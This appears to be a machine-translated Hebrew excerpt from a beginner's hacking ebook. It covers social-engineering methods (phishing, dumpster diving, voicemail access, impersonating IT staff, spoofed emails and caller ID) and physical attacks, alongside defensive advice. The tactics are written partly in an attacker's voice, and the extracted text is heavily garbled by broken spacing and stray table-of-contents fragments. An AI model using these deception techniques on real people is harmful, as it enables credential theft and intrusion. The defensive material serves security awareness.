‫מ כיוון שהמ טרה ש ל ההנד סה ה ח ברתית היא לרמות מי שהו ל ספ ק מידע שיאפ שר גי שה לנתונים בע לי ערך ר ביותר‪ ,‬ט ק טי קת הפריצה הזו תאפ שר‬
‫לך ל ק ב ל בעי קר כ ל ד בר ממער כת ממו קדת‪ .‬מה שהופך את זה ל ט ק טי קה טו בה הוא שאתהי כו ל לדוג א חר שער למידע שאתה רוצה לפרוץ מ כ ל‬
‫מי שי ש לו גי שה למער כת שא ליה אתה מ כוון‪ ,‬מפ קידי ק ב לה ועד לאנ שי ‪ IT,‬עם ה ש ל בים ה באים‪:‬‬
‫‪ 1.‬מ ח קר‬
‫‪2.‬יצירת אמון‬
‫‪3.‬ניצו ל מער כת הי ח סים ע לידי ת ק שורת עם אדם ממו קד‬
‫‪ 4.‬שימו ש במידע שד לף למ טרות רוו ח זדוני‬
‫האמנות והמדע שמא חורי ההנד סה ה ח ברתית נוצרים בג ל ל אמת א חת ע ל א ב ט חת מידע ‪-‬א ב ט חה מ סתיימת ומת חי לה בידע ש ל המ שתמ ש כיצד‬
‫י ש להגן ע ל מער כת‪ .‬לא מ שנה עד כמה מער כת הא ב ט חה ש לך מעוד כנת‪ ,‬לעו לם לא תו כ ל להגן ע ל הר שת ש לך ו ש לך‬
‫מ כ שירים אםי ש מ שתמ ש בצד ש לך שאינו מ סוג ל ל שמור מידע חיוני מתו קפים פו טנציא ליים‪ .‬עם המ ח ש בה הזו עו לה הרעיון‬
‫ש ברגע שמהנד ס ח ברתי נע שה מודעיותר למי צריך למ קד בתוך הארגון מידע קרי טי הדרו ש כדי ל חדור למער כת‪ ,‬כך‬
‫המידע בע ל הערך ש ל הארגון פגיעיותר‪.‬‬
‫איך הנד סה ח ברתית מתר ח שת‬
‫אם אתה הו לך ל ח שו ב כמו מהנד ס ח ברתי‪ ,‬ת ק ב ל את הרעיון שהאנ שים הפגיעים ביותר בתוך כ ל ארגון הם א לה ש ס ביר‬
‫מאוד שימ סרו מידע עם ה כי פ חות התנגדות אפ שרית‪.‬‬
‫עם המ ח ש בה הזו‪ ,‬אתהי כו ל ב ק לות לאפ ס את פ קידי ה ק ב לה‪ ,‬סו כני המו קד ה ט לפוני וא חרים שהו כ שרו למ סור מידע ל כ ל‬
‫מי שמ ב ק ש אותם‪ .‬אפ שר להני ח שה באים בתור הם מ שתמ שי קצה שהם תמימים מ ספי ק ל ח שו ב שהםי כו לים ל ספ ק מידע‬
‫אי שי לא לה שמתיימרים להיות אנ שי תמי כה ט כנית‪ ,‬מפ ק חים או אנ שים שי כו לים ל ספ ק להם פר ס ר ק ע ל ת שו בה ל שא לה‬
‫שע לו לה להד ליף את הת שו בה ל שא לת פר טיות‪.‬‬
‫מ כיוון שהנד סה ח ברתית נ שענת מאוד ע ל התנהגות המ שתמ שים כ לפי א ב ט חת מידע‪ ,‬האנ שים הרגי שים ביותר להת קפות‬
‫הם ה באים‪:‬‬
‫‪1.‬אנ שים ש חו שפיםיותר מדי מידע ע ל חייהם האי שיים‬
‫‪2.‬אנ שים שיוצרים סי סמאות באמצעות שמות‪,‬ימי הו לדת או שם חיית המ חמד ש להם‬
‫‪3.‬אנ שים ש חו שפים מידע ע ל המ כ שירים ש בהם הם מ שתמ שים‬
‫‪4.‬אנ שים שמ שתמ שים באותן סי סמאות כמע ט ל כ ל ח ש בון‬
‫‪5.‬אנ שים שאינם מא ב ט חים פיזית את המ כ שירים ש להם‪ ,‬או כ ל מ סמך שע לו ל להצ ביע ע ל פר טים ע ל פרו טו קו לי‬
‫א ב ט חת מידע‬
‫כ ל עוד אתהי כו ל ל ק ב ל גי שה ל סוגים א לה ש ל אנ שים‪ ,‬אז אתהי כו ל ב ק לות ל ח ט ט ב כ ל מידע שאתה רוצה לה שיג מ ב לי‬
‫להתאמץיותר מדי‪ .‬ע לידי הי כו לת לאתר את סוגי המ שתמ שים ה ל לו ב כ ל ארגון‪ ,‬תו כ ל ל ק ב ל נתוניםי קרי ערך כ כ ל שתו כ ל‬
‫כאי לו הייתה לך גי שה ל כ ל המ כ שירים הממו קדים‪.‬‬
‫סוגי הת קפות הנד סה ח ברתית‬
‫לה לן כמה מההת קפות הנפוצות ביותר המ שמ שות מהנד סים ח ברתיים כדי ל ק ב ל מהמ שתמ שים את המידע שהם רוצים‪:‬‬
‫‪ 1.‬פי שינג‬
‫ברגע שמהנד ס ח ברתי מגדיר את סוג המידע שהוא רוצה להוציא ממ שתמ ש‪ ,‬הוא מת חי ל לא סוף כמה שיותר מידע‬
‫ע ל מ טרה מ ב לי להפעי ל אזע קה‪ .‬לדוגמה‪ ,‬אם מהנד ס ח ברתי מעוניין ל חדור למער כת הא ב ט חה ש ל הארגון‪ ,‬ס ביר‬
‫להני ח שהואיצ טרך ל ק ב ל ר שימה ש ל עו בדים שעו בדים בו‪ ,‬מ ספר מ ספרי ט לפון ב שימו ש פנימי או לו ח פעי לויות‬
‫המ שמ ש את ה ח ברה‪ .‬באמצעות כ ל המידע הזה הואי כו ל לצאת לת קיפה ביום ש בו נמצאים ה כי פ חות אנ שי‬
‫א ב ט חה‪ ,‬לע שות ת קיפה ש ל מהנד ס ח ברתי נגד אנ שי מפת ח דרך קו ת ק שורת ה כי פ חות ח שוד‪.‬‬
‫י ש הר בה דר כים כיצד ניתן ל בצע הת קפת דיוג‪ .‬אפ שר לה שתמ ש ב ח ש בון אימיי ל מזויף או במ ספר ט לפון ו להעמיד‬
‫פנים שהוא מפ ק ח המ ב ק ש לר שימת אנ שי ק שר ר שמית‪ .‬אפ שר גם לה סת כ ל ע ל ח ש בונות מדיה ח ברתית ש ל ארגון‬
‫ממו קד ו למצוא מי צפוי להיות א חראי ע ל ארגון לו חות הזמנים ש ל ה ח ברה‪ .‬אם מהנד ס ח ברתי מעדיף לה ש קיע‬
‫פ חות זמן במ ח קר ש לו‪ ,‬הואי כו ל פ שו ט ל ב חור ל ש לם ע בור בדי קת ר קע מ קיפה ע ל אנ שים ממו קדים באינ טרנ ט‪.‬‬
‫ברגע שהמידע הדרו ש מת ק ב ל‪ ,‬מהנד ס ח ברתיי כו ל להפעי ל מת קפת פי שינג מ קיפהיותר‬
‫א חת ה ט ק טי קות היעי לות ביותר להנד סה ח ברתית בה מ שתמ שים הא קרים היא להגיע למ טרה ו להעמיד פנים‬
‫ש ח ש בון ש ל קור בן נפרץ‪ .‬ע לידייצירת ת חו שת ד חיפות‪ ,‬כ ל מהנד ס ח ברתי ע שוי להעמיד פנים שהוא מציע סיוע‬
‫ע לידי ב ק שת מידע חיוני כגון שם נעוריה ש ל האם‪ ,‬תאריך לידה‪ ,‬פרו טו קו לי ש חזור ח ש בון וה סי סמה הא חרונה‬
‫ש בה נע שה שימו ש‪.‬יעד צנוע ע שוי ל ספ ק את כ ל הנתונים ה ל לו מ ב לי לוודא עם מי הוא מד בר‪ ,‬או אם ה ח ש בון ש לו‬
‫באמת נפרץ‪.‬‬
‫‪2.‬צ לי לת א שפה‬
‫אמנם שי טה זוי כו לה להיות מע ט מ בו לגנת ומ סו כנת‪ ,‬אך חיפו ש ב חומרים ש ל ה ח ברה שנזר קהי כו ל להיות דרך‬
‫יעי לה מאוד ל ק ב ל מידע סודי ביותר‪ .‬כפי שה שם מרמז‪ ,‬זה כרוך לעתים קרו בות ב חי טו ט בפ חי א שפה ש ל ארגון‪,‬‬
‫בת קווה למצוא מ סמ כי מפת ח בפ ח‪.‬‬
‫שי טה זויעי לה מאוד מ כיוון שרו ב האנ שים מאמינים שהד ברים שהם זור קים לפ ח הם ב טו חים‪ ,‬וזה כו ל ל מ סמ כים‬
‫המצ ביעים ע ל כתו בות ה בית ש להם‪ ,‬מ ספרי ט לפון אי שיים וניירת סודית‪ .‬אנ שים פ שו ט לא חו ש בים שי ש שפע ש ל‬
‫מידע זמין במ סמ כים שהם זור קים לא חר ש סיימו עם זה‪ .‬מ סי בה זו‪ ,‬ניתן למצוא ב ק לות את הד ברים ה באים בפ ח‬
‫הא שפה‪:‬‬
‫תר שימים ארגוניים‬

‫ר שימת סי סמאות‬
‫דיוו חים‬
‫תדפי סי מיי ל‬
‫ספרי עזר לעו בדים‬
‫מדיניות א ב ט חה פנימית‬
‫מ ספרי ט לפון‬
‫דיאגרמות ר שת‬
‫הערות פגי שה‬
‫ז כור כיי שנם כמה מהנד סים ח ברתיים מ סורים שעדיין מוצאים ערך במ סמ כים מגוררים ש כן הם מ כירים ב כך‬
‫שניירת מגוררת מ כי לה מידע שארגון לא רוצה שאף א חדיג לה‪ .‬בהינתן מ ספי ק זמן ו ק ל טת‪ ,‬כ ל הא קריו כ ל ל ח בר‬
‫מ סמך מגורר ברי שו ל‪.‬‬
‫‪ 3.‬חפירת תא קו לי‬
‫זוהי ט ק טי קה המ שמ שת מהנד סים ח ברתיים כדי לג לות פר טים מעמי קים ואו לי מידע פר טי ע ל אדם ע לידי ניצו ל‬
‫פ שו ט ש ל ת כונת ה חיוג לפי שם המו טמעת ברו ב ההודעות ה קו ליות‪ .‬כדי לה קי ש ע ל ת כונה זו‪ ,‬כ ל מה שאתה צריך‬
‫הוא ל חייג ‪ 0‬לא חר הת ק שרות למ ספר ש ל ח ברה או מיד לא חר שהגעת לתי בת הדואר ש ליעד‪ .‬זה נע שה בדרך כ ל ל‬
‫לא חר שעות הע בודה כדי לוודא שאף א חד בארגון לאיהיה זמין לענות ל שי חה‪.‬‬
‫הדואר ה קו לי מ כי ל בדרך כ ל ל שפע ש ל מידע פר טי‪ ,‬כמו מ קרים ש בהם אדם אינו זמין‪ ,‬וזה חיוני ב כ ל הנוגע לתזמון‬
‫ת קיפה כו ל לת‪ .‬ח ל קם גם מ שתמ שים במידע שהם מוצאים בהודעות הדואר ה קו לי כדי לג לות כמה פר טים שהם‬
‫י כו לים לה שתמ ש בהם כדי להת חזות לאנ שים הא לה ו לה שתמ ש באי שיות ש להם כדי לפתו ח במת קפה‪.‬‬
‫מהנד סים ח ברתייםי כו לים ב ק לות לה סתיר את זהותם ומי קומם ב כ ל פעם שהם מ קי שים ע ל הודעות קו ליות ע לידי‬
‫שימו ש ב שרתי ‪ VoIP‬כגון ‪ Asterisk‬כדי להזין כ ל מ ספר ט לפון שהם רוצים ב כ ל פעם שהם מת ק שרים‪.‬‬
‫‪4.‬ת ק שורת פעי לה עם המ טרה‬
‫א חד האמצעים היעי לים ביותר לה שיג מידע באמצעות הנד סה ח ברתית הוא ל ב ק ש מהיעד את המידע הדרו ש‬
‫י שירות‪ .‬כדי שה ט ק טי קה הזו תע בוד‪ ,‬כ ל מה שמהנד ס ח ברתי צריך לע שות הוא ל בנות מ ספי ק אמון בינו ל בין היעד‬
‫ע ל מנת לה שיג את המידע שהוא צריך מ ב לי להית ק ל בהתנגדות כ ל שהי‪.‬‬
‫לדוגמה‪ ,‬מהנד ס ח ברתי ע שוי להו בי ל קור בן הי שר למ קום ש בו נמצאת המער כת שהוא רוצה להפר‪ .‬הוא ע שוי‬
‫ל ק ב ל זהות א חרת‪ ,‬כגון מנה ל או אנ שי ‪ IT,‬ו להמ שיך ל שאו ל שא לות שע לו לות ל ס כן ק שות את ה ח ש בון האי שי ש ל‬
‫אדם או ל ח שוף פרו טו קו לי א ב ט חת ר שת חיוניים‪ .‬אתה ע שוי להיות מופתע מ שפע המידע שאתהי כו ל ל ק ב ל‬
‫מתוך אנ שים פ שו ט ל שאו ל!‬
‫‪5.‬זיוף‬
‫ה ט כנו לוגיה הופ כת את ההנד סה ה ח ברתית ל ק להיותר ע לידי מי סוך הזהות ש ל האדם ע ל מנת להעמיד פנים‬
‫שהוא מי שהו שמיעדיםי כו לים לזהות אותו כא חד מ ש להם‪ .‬אתהי כו ל ב ק לות ל ב ק ש ממ שתמ ש ל ש לו ח כ ל סוג ש ל‬
‫מידע סודי ע לידייצירת אימיי ל מ קצועי ו לגי טימי למראה המ ב ק ש מ ספרי תעודת זהות‪ ,‬מזהי מ שתמ ש ואפי לו‬
‫סי סמאות‪ .‬ח ל ק מהמ שתמ שים אפי לו מנד בים מידע סודי זה בתמורה ל סי סמת ‪ Wi-Fi‬ב חינם‪ ,‬או מתנה בתמורה‪.‬‬
‫אתהי כו ל אפי לו לה שתמ ש במיי לים מזויפים כדי ל ב ק ש ממ שתמ ש להת קין במ ח ש ב ש לו תי קון שי כו ל ל שמ ש כמ כ שיר‬
‫האזנה או כווירו ס‪.‬‬
‫א חת ההת קפות הפופו לריות ביותר המ שתמ שות ב טרי ק הזה היא תו לעת ‪ LoveBug‬שמ שתמ שים הת קינוי שירות‬
‫לתוך המער כות ש להם פ שו ט ע לידי פתי חת קו בץ מצורף במיי ל שאמור ל ח שוף את זהותו ש ל מעריץ סודי‪ .‬למרות‬
‫שזה או לי נראה ברור מדי ש לפתו ח הת ק שרות מאדם שאינך מ כיר זה לא הגיוני‪ ,‬אנ שים נפ לו בפ ח הזה ב כ ל מ קרה‪.‬‬
‫מה אתהי כו ל לע שות נגד הנד סה ח ברתית‬
‫הנה כמה ד ברים שאתהי כו ל לע שות כדי למנוע ליפו לי שר לתוך מ ל כודת הנד סה ח ברתית‪ ,‬או למזער כ ל נז ק שנגרם ע לידי‬
‫כ ל מת קפת הנד סה ח ברתית‪:‬‬
‫‪1.‬‬ ‫מנע את נ קודת ה כ ש ל ה בודדת‬
‫כ כ ל שה ח ש בונות ש לך ת לוייםיותר זה בזה‪ ,‬כך אתה פגיעיותר להת קפה‪ .‬ודא שאתה נמנע מ לה כני ס את כ ל‬
‫ה ביצים ש לך ל ס ל א חד ‪-‬א ל ת שתמ ש ב ח ש בון דוא" ל א חד בעת אימות ח ש בונות א חרים ש בהם אתה מ שתמ ש‪ ,‬או‬
‫ה שתמ ש בדוא" ל נפרד ל ש חזור סי סמה‪.‬‬
‫‪2.‬‬ ‫ה שתמ ש ב כני סות שונות ע בור כ ל ח ש בון ש בו אתה מ שתמ ש וודא שה סי סמאות ש לך מאו ב ט חות‬
‫ודא ש לעו לם לא מ קפיד לה שתמ ש ב סי סמהיותר מפעם א חת‪ .‬ברו ח דומה‪ ,‬דאג שאתה מ שתמ ש גם ב סי סמאות‬
‫ש ק שה מאוד לנ ח ש‪.‬‬
‫‪3.‬‬ ‫ה שתמ ש תמיד באימות דו‪-‬גורמי‬
‫ה שתמ ש במ כ שיר א חר או ב ח ש בון א חר בעת אימות ה ח ש בונות ש לך ‪-‬זה מ ק שה ע ל גנ בים ל ח טוף את ה ח ש בונות‬
‫ש לך‪.‬‬
‫‪4.‬‬ ‫היויצירתיים בעתיצירת שא לות א ב ט חה‬
‫א ל ת לך ע ל ה שא לות והת שו בות ה ברורות כ שזה מגיע ליצירת שא לות א ב ט חה ע בור ה ח ש בונות ש לך‪ .‬ודא ש ק שה‬
‫לנ ח ש את כ ל שא לות הא ב ט חה והת שו בות‪.‬‬
‫‪5.‬‬ ‫א ב ט ח את האי שורים ה בנ קאיים ש לך‬
‫אם אתה צריך ל קנות באינ טרנ ט או לה שאיר פר טי בנ ק באתר לצורך נו חות הגי שה‪ ,‬ה קפד ל בדו ק את פרו טו קו ל‬
‫הא ב ט חה ש ל האתר‪ .‬באותה צורה‪ ,‬דאג ש לא ת שתמ ש ב כר טי סי חיו ב בעת ביצוע ר כי שה ‪ -‬ברגע שמידע ה בנ ק ש לך‬
‫מתג לה ע לידי מהנד ס ח ברתי‪ ,‬זה מאוד מ ק ל ע ליו לרו קן את כ ל ח ש בון ה בנ ק ש לך ברגע שהוא מ שי ק אפ ק טי בי‬
‫מת קפת דיוג‪.‬‬
‫‪6.‬‬ ‫שים ל ב תמיד לנתונים האי שיים ש לך ו ל ח ש בונות ש בהם אתה מ שתמ ש‬
‫ה קפד ל בדו ק באופן ק בוע את הפעי לויות ב כ ל ה ח ש בונות ש לך‪ .‬אםי ש לך ח ש בון מדיה ח ברתית שאינך מ שתמ ש בו‬
‫יותר‪ ,‬מ ח ק אותו כדי למנוע ה שארת ח ש בון פגיע שע לו ל להיפרץ מ כיוון שאינך בוד ק אותו באופן פעי ל מעת לעת‪.‬‬
‫י חד עם זאת‪ ,‬ה קפד ל בדו ק באופן ק בוע את כ ל ח ש בונות ה בנ קאות המ קוונים והמיי לים כדי לראות אם בוצעה‬
‫פעי לות ח שודה או ני סיון דיוג‪.‬‬
‫‪7.‬‬ ‫דאג לה סיר את המידע ש לך ממאגרי מידע צי בוריים‬
‫מ סדי נתונים צי בוריים הם מר כז ע שיר ש ל מידע ע בור הא קרים ‪ -‬בעוד שאתה ע שוי ל ח שו ב ש להימצא באינ טרנ ט זה‬
‫טו ב לר שתות אי שיות‪ ,‬כ ל הפר טים שאתה מ שאיר בר שת העו למית מאפ שרים למהנד סים ח ברתיים לזהות אותך‬
‫כיעד‪ .‬מ סי בה זו‪ ,‬ה קפד ל שמור את כ ל המידע האי שי‪ ,‬כגון מי קום המ שרד‪ ,‬מ ספרי ט לפון‪ ,‬ואפי לו כתו בות דואר‬
‫א ל ק טרוני הר ח ק מעיני הא קר‪.‬‬
‫‪8.‬‬ ‫היה א חראי ע ל הז ב ל הדיגי ט לי ש לך‪.‬‬
‫אם אתה צריך לזרו ק כ ל פרי ט שע שוי לה כי ל מידע כ ל שהו ע ליך‪ ,‬דאג להרו ס אותו ל ח לו טין כדי להימנע מ כ ל‬
‫הת קפת הנד סה ח ברתית באמצעות צ לי לה לא שפה‪.‬‬
‫הדרך ה טו בה ביותר להימנע מ להיות מ טרה ש ל מהנד סים ח ברתיים היא להיות ספ קנות בריאה ו להפעי ל ערנות‪ ,‬במיו חד‬
‫כא שר אתה מת ב ק ש למ סור מידע פר טי‪ .‬ז כור ש ב כ ל פעם שאתה מת ב ק ש למ לא טופ ס או אפי לו ל ספ ק פר ט ש ל כאורה לא‬
‫סודי ל כ ל א חד‪ ,‬א לא אם אתהי כו ל לאמת את זהות מי שפונה א ליך‪.‬י חד עם זאת‪ ,‬ז כור שאפי לו מנה לים‪ ,‬אנ שי ‪IT‬או עמיתים‬
‫לע בודה אינם אמורים לדעת מהן ה סי סמאות ש לך‪.‬‬
‫נהג באותה זהירות כא שר אתה מ ספ ק גי שה למ כ שירים ש לך או ל כ ל מ קום ליד המער כת שע ליה אתה מת כוון להגן‪ .‬ודא ש כ ל‬
‫אדם שמת קר ב ל ט לפונים‪ ,‬ה טא ב ל טים או ת חנות הע בודה ש לך הוא אנ שים שאתה מ כיר‪.‬‬
‫פר ק ‪11:‬הת קפות פיזיות‬
‫בעוד שהנד סה ח ברתית היא ט ק טי קה שנמצאת ב שימו ש נר ח ב ע לידי הא קרים כדי לה שיג מידע ע לידי מניפו לציה ש ל‬
‫מ שתמ ש ל ח שוף מידע אי שי‪ ,‬הת קפה פיזית היא דרך ערמומית עודיותר ל ק ב ל גי שה למער כת‪ .‬הת קפה זו כרו כה ב ק ב לת‬
‫גי שה פיזית למ כ שיר כדי לגנו ב או להתפ שר ע ל נתונים לרוו ח אי שי‪.‬‬
‫למה הת קפות פיזיות עו בדות‬
‫רו ב האנ שים בא ב ט חת ט כנו לוגיית המידע מאמינים ש כ ל עוד הם שמרו ע ל הר שתות ש להם‪ ,‬מריצו מ ספר סרי קות ביום או‬
‫דואגים שי ש להם את התו כנה הנ כונה הם מוגנים מ כ ל הת קפה‪ .‬עם זאת‪ ,‬אמונה זו ע לו לה לגרום ל בעיות ר בות ב כ ל הנוגע‬
‫להגנה ע ל מער כת ש למה מפני פריצה‪ .‬מ כיוון שי שיותר מדי אנ שי ‪ IT‬שמאמינים שתפ קידם לוודא שהם מ בצעים את‬
‫ה סרי קות הנ כונות ביום‪,‬יית כן שהם לעו לם לאיצפו להת קפה פיזית‪.‬‬
‫מער כת ע לו לה ל ס בו ל מהת קפה פיזית מ כוונת כא שר מ שתמ ש נו כ ל מ ק ב ל גי שה למ כ שיר מוגן וממ שיך ל בצע הת קפה‪ .‬כ ל‬
‫עוד הא קר מ ק ב ל גי שה פיזית ל כ ל ד בר שי ש לו מ ח ש ב או תו כנת מ ח ש ב‪ ,‬אתהי כו ל לה ב טי ח שיהיה הפ סד עצום בצד ש ל‬
‫ה קור בן‪.‬‬
‫אמנם ת קיפה פיזית ע שויה להיראות מ סו כנת מ כדי ל בצע אותה‪ ,‬א ב ל היא עו בדת כמו ה טרי ק הי שן ש ל ב חירת מנעו לים ‪-‬‬
‫ברגע שאתהי כו ל לע בור א ב ט חה פיזית‪ ,‬אתהי כו ל ב ק לות להת קין מ כ שיר האזנה‪ ,‬לג שת ל שורת פ קודה מר חו ק שתאפ שר‬
‫לך ל ש לו ט במער כת המ ח ש ב ש ל המ כ שיר ממר ח ק ב טו ח‪ ,‬לפרוץ מ כ שירים א חרים המ חו ברים א ליו ועוד הר בהיותר‪.‬‬
‫גי לוי פגיעויות‬
‫ת קיפה פיזית היא ת קיפה ש כמע ט מו ב ט חת שתע בוד‪ ,‬ויי ק ח להא קר מיומן ר ק כמה ד קות ל ש לו ט במ כ שיר או ל ק ב ל את‬
‫הנתונים הדרו שים לו ממער כת שהוא מ סוג ל לג שת א ליה‪ .‬מ סי בה זו‪ ,‬ח שו ב מאוד שתהיו מודעים לפגיעויות הפיזיות האפ שריות‬
‫ש ל המער כת ע ליה אתם מגנים‪.‬‬
‫בדו ק את הגורמים ה באים כא שר אתה מ חפ ש פגיעות פיזיות‪:‬‬
‫‪ 1.‬מ ספר אתרים או מ בנים המ כי לים מער כות שע לי כם להגן ע ליהן‬
‫‪ 2.‬מ ספר העו בדים והגי שה ש להם למ כ שירים או פריפריות מ ח ש ב‬
‫‪ 3.‬מ ספר כני סות ויציאות ב בניין ונ קודות גי שה אפ שריות למ כ שירים‬
‫‪ 4.‬מי קום מר כזי נתונים ב בניין‪ ,‬כמו גם מו קדים אפ שריים נו ספים ש ל מידע סודי‬
‫‪ 5.‬מ ספר ומי קומם ש ל מ כ שירים או פריפריות מ ח ש ב המ חו ברות זו לזו‪.‬‬
‫כא שר אתה מ סת כ ל ע ל הר שימה לעי ל‪ ,‬אתהי כו ל או לי לדמיין שי ש א לפי הפרות אפ שריות ש ל א ב ט חה פיזית שע לו לות‬
‫ל קרות‪ .‬אם אתהי כו ל ל ח שו ב איך ע בריין אפ שריי כו ל לה שיג גי שה פיזית ל ח ל ק בודד ש ל מער כת המ ח ש ב שאתה מת כוון‬
‫להגן ע ליו‪ ,‬אזית כן מאוד שהא קרים פ לי ליים חו ש בים אותו ד בר‪.‬‬
‫א ב ט חת הפריפריה‬
‫כדי לה ב טי ח את ה ב טי חות הפיזית ש ל המ כ שירים ש לך‪ ,‬ה קפד לצמצם או להימנע מהפגיעויות ה באות‪:‬‬
‫‪1.‬היעדר פי קו ח ע ל מי שנ כנ ס ויוצא מהמ בנה‬
‫‪2.‬אין כני סת מ לווים או מ ב קרים לגי שה ל בניין‬
‫‪ 3.‬עו בדים המאפ שרים למ ב קרים לג שת מיידית ל בניין כא שר נאמר להם שהם עו בדים ע בור המ שרד או ע בור ספ ק‬
‫‪ 4.‬חו סר ב קרות גי שה לד לת או שימו ש במפת חות שניתן ל ש כפ ל ב ק לות‬
‫‪ 5.‬מר כז נתונים מ בו ס ס ‪IP,‬וידאו‪ ,‬ב קרת גי שה וניהו ל מר כז נתונים שניתן לג שת א ליהם‬

‫עם מזהה מ שתמ ש בודד או סי סמה‬
‫‪ 6.‬חדרי מ ח ש ב ל לא הג ב לת גי שה‬
‫‪7.‬תו כנה או מדיה ל ק בצים שניתן לא סוף ב ק לות ע לידי כ ל א חד‬
‫‪ 8.‬מידע רגי ש במ סמ כים או בדי ס קים בפ ח שאינם מגוררים גרו סים ב קפידה‬
‫‪ 9.‬חומרה לא מאו ב ט חת כגון מ ח ש בים ניידים‪ ,‬מ כונות צי לום‪ ,‬ט לפונים או טא ב ל טים‬
‫כא שר א חת או שתיים מה חו ל שות ה ל לו קיימות‪ ,‬אתהי כו ל להיות ב טו ח שהמער כת שאתה רוצה לא ב ט ח מועדת מאוד‬
‫להת קפה פיזית‪ .‬כדי למנוע את זה‪ ,‬תצ טרך לוודא ש כ ל המ סמ כים‪ ,‬ההת קנים או ר כזות המידע שי ספ קו פר טים נו ספים ע ל‬
‫נ קודות התורפה ש ל המער כת ש לך מאו ב ט חים‪.‬‬
‫זה גם הגיוני להגן ע ל המער כת ע לידי הג ב לת גי שה ל ח ש בונות ומער כות מנה לים ‪ -‬ודא שמפת חות ו סי סמאות אינם נגי שים‬
‫ל כ ל המ שתמ שים‪ .‬כמו כן‪ ,‬ה קפד ל בדו ק באופן שו טף את כ ל המ כ שירים שניג שים א ליהם ו לראות אם בוצעו שינויים בתו כנה‬
‫ו ב חומרה‪.‬‬
‫שימו ל ב שהת קפות פיזיות ע לו לות להתר ח ש לאורך זמן ‪ -‬עו בד נו כ ל ע שוי לה שתי ל לא ט לא ט מ כ שירי האזנה או לה ח לי ש את‬
‫פרו טו קו לי הא ב ט חה כך שהר שויות לאי שימו ל ב מיד כ שמ שהו לא ב סדר קורה‪.‬‬

Hacking - Beginner To Expert Guide To Computer Hacking

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Hacking - Beginner To Expert Guide To Computer Hacking

Uploaded by

Copyright:

Available Formats

Machine Translated by Google

‫‪Machine Translated by Google‬‬

‫מדריך מת חי ל עד מומ חה לפריצת מ ח ש בים‪ ,‬א ב ט חה ב סי סית ו‬

‫מאת ג'יימ ס פ טר סון‬

‫מדריך מת חי ל עד מומ חה לפריצת מ ח ש בים‪ ,‬א ב ט חה ב סי סית ו‬

‫מאת ג'יימ ס פ טר סון‬

‫שו ב תודה שהורדת את ה ספר הזה‪ .‬אני מ קווה שתהנה מזה!‬

‫פר ק ‪ 1:‬פריצה ‪101‬‬

‫האם הא קינג מתאים ל כו לם?‬

‫האם ק שה ל למוד ו לה בין?‬

‫מיומנויות שאתה צריך‬

‫פר ק ‪ 2:‬כיצד הא קרים מוצאים את המ טרות ש להם‬

‫ארגון הפרוי ק ט ש לך‬

‫ביצוע סרי קות מער כת‬

‫מהי הת קפה א ק טי בית?‬

‫פר ק ‪ 5:‬כ לי פריצה‬

‫פר ק ‪ 7:‬פריצת סי סמאות‬

‫הערות ע ל הצפנת סי סמה‬

‫דר כים א חרות ל ח שוף סי סמאות‬

‫ניצו ל מ כ שיר נייד מר חו ק‬

‫הא קרים מ חו ל קים בדרך כ ל ל ל ק טגוריות ה באות‪:‬‬

‫‪1.‬הא קרים כו בע ש חור‬

‫‪2.‬הא קרים כו בע ל בן‬

‫‪3.‬הא קרים ש ל כו בע אפור‬

‫כדי להפוך להא קר אתי טו ב‪ ,‬אתה צריך להיות בע ל ה כי שורים ה באים‪:‬‬

‫‪ 1.‬כי שורי מ ח ש ב בינוניים‬

‫‪ 2.‬כי שורי נ טוור קינג טו בים‬

‫‪ WEP‬לעומת סי סמאות ‪WPS‬‬

‫כתו בות ‪MAC‬‬

‫כתו בות ‪ IP‬פר טיות וצי בוריות‬

‫‪ 3.‬שימו ש במער כת הפע לה לינו ק ס‬

‫‪4.‬ויר טוא ליזציה‬

‫‪5. Tcpdump‬או ‪Wireshark‬‬

‫‪6.‬ה כרת ט כנו לוגיות ומו שגי א ב ט חה‬

‫‪ 7.‬כי שורי ת סרי ט‬

‫‪ 1.‬עיצו ב ארגון‪ ,‬הג שות ורי שום‬

‫‪ 3.‬ח ש בונות מדיה ח ברתית‬

‫‪ 1.‬מ שתמ ש או מ טפ ל שאו ליי שאיר את המ כ שיר המיועד ל לא ה שג חה‬

‫‪ 2.‬סי סמאות ח ל שות או ל לא שינוי המ שמ שות או לי ב כ ל המ כ שירים המ סונ כרנים‬

‫ברגע שאתה מ סוג ל לע קו ב א חר כ ל פרו טו קו ל א ב ט חה ה כר חי‪ ,‬שא ל את עצמך את ה שא לות ה באות‪:‬‬

‫‪ 1.‬ע ל איזה סוג מידע במער כת ש לך אתה צריך להגן ה כי הר בה?‬

‫‪ 2.‬מה הת קצי ב ש לך לפריצה אתית?‬

‫‪ 3.‬מה אתה רוצה להוציא מ בדי קות הפריצה ש לך?‬

‫‪2.‬אי לו ח ל קים במער כות ש לך נראים ה כי פגיעים להת קפת הא קרים?‬

‫‪ 1.‬שרתי דואר א ל ק טרוני‪ ,‬הדפ סה ו ק בצים‬

‫‪ 3.‬שרתי מ סד נתונים‪ ,‬אינ טרנ ט ויי שומים‬

‫‪ 4.‬מער כות הפע לה ש ל ל קו ח‪ /‬שרת‬

‫‪ 5.‬טא ב ל טים‪ ,‬מ ח ש בים ניידים ות חנות ע בודה‬

‫‪ 6.‬מתגים ונת בים‬

‫‪ 1.‬סוג מער כת ההפע לה או היי שומים פוע לים ע ל המער כת ש לך‬

‫‪ 2.‬סיווג ו כמות המידע ה קרי טי המאו ח סן במער כת המ ח ש ב ש לך‬

‫‪ 3.‬מער כות ואפ לי קציות הנמצאות בר שת‪.‬‬

‫אתהי כו ל לע שות את הפעו לות ה באות כדי לא סוף את הע ק בות הא לה‬

‫‪ 1.‬פ טנ טים או סימנים מ ס חריים‬

‫‪ 3.‬ר כי שות ומיזוגים קודמים‬

‫‪4.‬הודעות לעיתונות ע ל הר כ ש וה שינויים ה חיוניים ביותר בארגון ש לך‬

‫‪6.‬הג שות התאגדות‪ .‬אתהי כו ל ל חפ ש אותם באמצעות אתרים ע ס קיים כגון‬

‫הצג אי לו מאר חים מ טפ לים בדוא" ל זה ע בור דומיין מ סוים‬

‫הצגת מי קומים ש ל מאר חים‬

‫ראה אם מאר ח מ סוים מופיע בר שימה ה ש חורה כמאר ח טוו ח‬

‫הצג מידע כ ל לי ע ל רי שום דומיין‪.‬‬

